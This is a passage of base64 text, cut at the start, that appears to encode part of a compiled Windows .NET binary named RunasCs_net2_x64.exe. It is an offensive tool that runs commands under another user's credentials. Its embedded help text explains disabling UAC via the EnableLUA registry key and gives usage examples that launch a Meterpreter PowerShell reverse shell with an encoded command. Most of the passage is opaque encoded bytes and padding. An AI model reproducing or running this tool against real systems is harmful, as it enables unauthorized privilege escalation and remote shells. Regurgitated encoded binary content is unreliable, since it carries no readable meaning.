gAGYAbwBsAGwAbwB3AGkAbgBnACAAcgBlAGcAawBlAHkAIAB0AG8AIAAwACAAYQBuAGQAIAByAGUAcwB0AGEAcgB0ACAAdABoAGUAIABzAGUAcgB2AGUAcgA6AA0ACgANAAoAIAAgACAAIABIAEsARQBZAF8ATABPAEMAQQBMAF8ATQBBAEMASABJAE4ARQBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFAAbwBsAGkAYwBpAGUAcwBcAFMAeQBzAHQAZQBtAFwARQBuAGEAYgBsAGUATABVAEEADQAKAA0ACgBCAHkAIABkAGUAZgBhAHUAbAB0ACwAIAB0AGgAZQAgAGMAYQBsAGwAaQBuAGcAIABwAHIAbwBjAGUAcwBzACAAKABSAHUAbgBhAHMAQwBzACkAIAB3AGkAbABsACAAdwBhAGkAdAAgAHUAbgB0AGkAbAAgAHQAaABlACAAZQBuAGQAIABvAGYAIAB0AGgAZQAgAGUAeABlAGMAdQB0AGkAbwBuACAAbwBmACAAdABoAGUAIABzAHAAYQB3AG4AZQBkACAAcAByAG8AYwBlAHMAcwAgAGEAbgBkACAAdwBpAGwAbAAgAHUAcwBlAA0ACgBjAG0AZAAuAGUAeABlACAAdABvACAAbQBhAG4AYQBnAGUAIABzAHQAZABvAHUAdAAgAGEAbgBkACAAcwB0AGQAZQByAHIALgANAAoASQBmACAAeQBvAHUAIABuAGUAZQBkACAAdABvACAAcwBwAGEAdwBuACAAYQAgAGIAYQBjAGsAZwByAG8AdQBuAGQAIABvAHIAIABhAHMAeQBuAGMAIABwAHIAbwBjAGUAcwBzACwAIABpAC4AZQAuACAAcwBwAGEAdwBuAGkAbgBnACAAYQAgAHIAZQB2AGUAcgBzAGUAIABzAGgAZQBsAGwALAAgAHkAbwB1ACAAbgBlAGUAZAAgAHQAbwAgAHMAZQB0ACAAdABoAGUAIABwAGEAcgBhAG0AZQB0AGUAcgANAAoAJwBwAHIAbwBjAGUAcwBzAF8AdABpAG0AZQBvAHUAdAAnACAAdABvACAAMAAuACAASQBuACAAdABoAGkAcwAgAGMAYQBzAGUAIAB0AGgAZQAgAHAAcgBvAGMAZQBzAHMAIAB3AGkAbABsACAAYgBlACAAcwBwAGEAdwBuAGUAZAAgAHcAaQB0AGgAbwB1AHQAIAB1AHMAaQBuAGcAIABjAG0AZAAuAGUAeABlACAAYQBuAGQAIABSAHUAbgBhAHMAQwBzACAAdwBvAG4AJwB0AA0ACgB3AGEAaQB0ACAAZgBvAHIAIAB0AGgAZQAgAGUAbgBkACAAbwBmACAAdABoAGUAIABlAHgAZQBjAHUAdABpAG8AbgAuAA0ACgANAAoAVQBzAGEAZwBlADoADQAKACAAIAAgACAAUgB1AG4AYQBzAEMAcwAuAGUAeABlACAAdQBzAGUAcgBuAGEAbQBlACAAcABhAHMAcwB3AG8AcgBkACAAYwBtAGQAIABbAGQAbwBtAGEAaQBuAF0AIABbAHAAcgBvAGMAZQBzAHMAXwB0AGkAbQBlAG8AdQB0AF0AIABbAGwAbwBnAG8AbgBfAHQAeQBwAGUAXQAgAA0ACgANAAoAUABvAHMAaQB0AGkAbwBuAGEAbAAgAGEAcgBnAHUAbQBlAG4AdABzADoADQAKACAAIAAgACAAdQBzAGUAcgBuAGEAbQBlACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAdQBzAGUAcgBuAGEAbQBlACAAbwBmACAAdABoAGUAIAB1AHMAZQByAA0ACgAgACAAIAAgAHAAYQBzAHMAdwBvAHIAZAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHAAYQBzAHMAdwBvAHIAZAAgAG8AZgAgAHQAaABlACAAdQBzAGUAcgANAAoAIAAgACAAIABjAG0AZAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABjAG8AbQBtAGEAbgBkACAAcwB1AHAAcABvAHIAdABlAGQAIABiAHkAIABjAG0AZAAuAGUAeABlACAAaQBmACAAcAByAG8AYwBlAHMAcwBfAHQAaQBtAGUAbwB1AHQAPgAwAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGMAbwBtAG0AYQBuAGQAbABpAG4AZQAgAGYAbwByACAAdABoAGUAIABwAHIAbwBjAGUAcwBzACAAaQBmACAAcAByAG8AYwBlAHMAcwBfAHQAaQBtAGUAbwB1AHQAPQAwAA0ACgAgACAAIAAgAGQAbwBtAGEAaQBuACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGQAbwBtAGEAaQBuACAAbwBmACAAdABoAGUAIAB1AHMAZQByACwAIABpAGYAIABpAG4AIABhACAAZABvAG0AYQBpAG4ALgAgAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAEQAZQBmAGEAdQBsAHQAOgAgACIAIgANAAoAIAAgACAAIABwAHIAbwBjAGUAcwBzAF8AdABpAG0AZQBvAHUAdAAgACAAIAAgACAAIAAgACAAIAB0AGgAZQAgAHcAYQBpAHQAaQBuAGcAIAB0AGkAbQBlACAAKABpAG4AIABtAHMAKQAgAHQAbwAgAHUAcwBlACAAaQBuACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAdABoAGUAIABXAGEAaQB0AEYAbwByAFMAaQBuAGcAbABlAE8AYgBqAGUAYwB0ACgAKQAgAGYAdQBuAGMAdABpAG8AbgAuAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFQAaABpAHMAIAB3AGkAbABsACAAaABhAGwAdAAgAHQAaABlACAAcAByAG8AYwBlAHMAcwAgAHUAbgB0AGkAbAAgAHQAaABlACAAcwBwAGEAdwBuAGUAZAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABwAHIAbwBjAGUAcwBzACAAZQBuAGQAcwAgAGEAbgBkACAAcwBlAG4AdAAgAHQAaABlACAAbwB1AHQAcAB1AHQAIABiAGEAYwBrACAAdABvACAAdABoAGUAIABjAGEAbABsAGUAcgAuAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAEkAZgAgAHkAbwB1ACAAcwBlAHQAIAAwACAAYQBuACAAYQBzAHkAbgBjACAAcAByAG8AYwBlAHMAcwAgAHcAaQBsAGwAIABiAGUADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwByAGUAYQB0AGUAZAAgAGEAbgBkACAAbgBvACAAbwB1AHQAcAB1AHQAIAB3AGkAbABsACAAYgBlACAAcgBlAHQAcgBpAGUAdgBlAGQALgANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAGYAIAB0AGgAaQBzACAAcABhAHIAYQBtAGUAdABlAHIAIABpAHMAIABzAGUAdAAgAHQAbwAgADAAIABpAHQAIAB3AG8AbgAnAHQAIABiAGUADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAdQBzAGUAZAAgAGMAbQBkAC4AZQB4AGUAIAB0AG8AIABzAHAAYQB3AG4AIAB0AGgAZQAgAHAAcgBvAGMAZQBzAHMALgANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABEAGUAZgBhAHUAbAB0ADoAIAAiADEAMgAwADAAMAAwACIADQAKACAAIAAgACAAbABvAGcAbwBuAF8AdAB5AHAAZQAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAdABoAGUAIABsAG8AZwBvAG4AIAB0AHkAcABlACAAZgBvAHIAIAB0AGgAZQAgAHMAcABhAHcAbgBlAGQAIABwAHIAbwBjAGUAcwBzAC4ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAARABlAGYAYQB1AGwAdAA6ACAAIgAzACIADQAKAA0ACgBFAHgAYQBtAHAAbABlAHMAOgANAAoAIAAgACAAIABSAHUAbgAgAGEAIABjAG8AbQBtAGEAbgBkACAAYQBzACAAYQAgAHMAcABlAGMAaQBmAGkAYwAgAGwAbwBjAGEAbAAgAHUAcwBlAHIADQAKACAAIAAgACAAIAAgACAAIABSAHUAbgBhAHMAQwBzAC4AZQB4AGUAIAB1AHMAZQByADEAIABwAGEAcwBzAHcAbwByAGQAMQAgAHcAaABvAGEAbQBpAA0ACgAgACAAIAAgAFIAdQBuACAAYQAgAGMAbwBtAG0AYQBuAGQAIABhAHMAIABhACAAcwBwAGUAYwBpAGYAaQBjACAAZABvAG0AYQBpAG4AIAB1AHMAZQByAA0ACgAgACAAIAAgACAAIAAgACAAUgB1AG4AYQBzAEMAcwAuAGUAeABlACAAdQBzAGUAcgAxACAAcABhAHMAcwB3AG8AcgBkADEAIAB3AGgAbwBhAG0AaQAgAGQAbwBtAGEAaQBuAA0ACgAgACAAIAAgAFIAdQBuACAAYQAgAGMAbwBtAG0AYQBuAGQAIABhAHMAIABhACAAcwBwAGUAYwBpAGYAaQBjACAAbABvAGMAYQBsACAAdQBzAGUAcgAgAHcAaQB0AGgAIABpAG4AdABlAHIAYQBjAHQAaQB2AGUAIABsAG8AZwBvAG4AIAB0AHkAcABlACAAKAAyACkADQAKACAAIAAgACAAIAAgACAAIABSAHUAbgBhAHMAQwBzAC4AZQB4AGUAIAB1AHMAZQByADEAIABwAGEAcwBzAHcAbwByAGQAMQAgAHcAaABvAGEAbQBpACAAIgAiACAAMQAyADAAMAAwADAAIAAyAA0ACgAgACAAIAAgAFIAdQBuACAAYQAgAGIAYQBjAGsAZwByAG8AdQBuAGQALwBhAHMAeQBuAGMAIABwAHIAbwBjAGUAcwBzACAAYQBzACAAYQAgAHMAcABlAGMAaQBmAGkAYwAgAGwAbwBjAGEAbAAgAHUAcwBlAHIALAANAAoAIAAgACAAIABpAC4AZQAuACAAbQBlAHQAZQByAHAAcgBlAHQAZQByACAAcABzADEAIAByAGUAdgBlAHIAcwBlACAAcwBoAGUAbABsAA0ACgAgACAAIAAgACAAIAAgACAAUgB1AG4AYQBzAEMAcwAuAGUAeABlACAAIgB1AHMAZQByADEAIgAgACIAcABhAHMAcwB3AG8AcgBkADEAIgAgACIAJQBDAE8ATQBTAFAARQBDACUAIABwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwA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AAP8lACBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABABAAAAAYAACAAAAAAAAAAAAAAAAAAAABAAEAAAAwAACAAAAAAAAAAAAAAAAAAAABAAAAAABIAAAAWKAAAGwCAAAAAAAAAAAAAGwCNAAAAFYAUwBfAFYARQBSAFMASQBPAE4AXwBJAE4ARgBPAAAAAAC9BO/+AAABAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAQAAAABAAAAAAAAAAAAAAAAAAAARAAAAAEAVgBhAHIARgBpAGwAZQBJAG4AZgBvAAAAAAAkAAQAAABUAHIAYQBuAHMAbABhAHQAaQBvAG4AAAAAAAAAsATMAQAAAQBTAHQAcgBpAG4AZwBGAGkAbABlAEkAbgBmAG8AAACoAQAAAQAwADAAMAAwADAANABiADAAAAAsAAIAAQBGAGkAbABlAEQAZQBzAGMAcgBpAHAAdABpAG8AbgAAAAAAIAAAADAACAABAEYAaQBsAGUAVgBlAHIAcwBpAG8AbgAAAAAAMAAuADAALgAwAC4AMAAAAEwAFQABAEkAbgB0AGUAcgBuAGEAbABOAGEAbQBlAAAAUgB1AG4AYQBzAEMAcwBfAG4AZQB0ADIAXwB4ADYANAAuAGUAeABlAAAAAAAoAAIAAQBMAGUAZwBhAGwAQwBvAHAAeQByAGkAZwBoAHQAAAAgAAAAVAAVAAEATwByAGkAZwBpAG4AYQBsAEYAaQBsAGUAbgBhAG0AZQAAAFIAdQBuAGEAcwBDAHMAXwBuAGUAdAAyAF8AeAA2ADQALgBlAHgAZQAAAAAANAAIAAEAUAByAG8AZAB1AGMAdABWAGUAcgBzAGkAbwBuAAAAMAAuADAALgAwAC4AMAAAADgACAABAEEAcwBzAGUAbQBiAGwAeQAgAFYAZQByAHMAaQBvAG4AAAAwAC4AMAAuADAALgAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACQAAAMAAAAcDwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA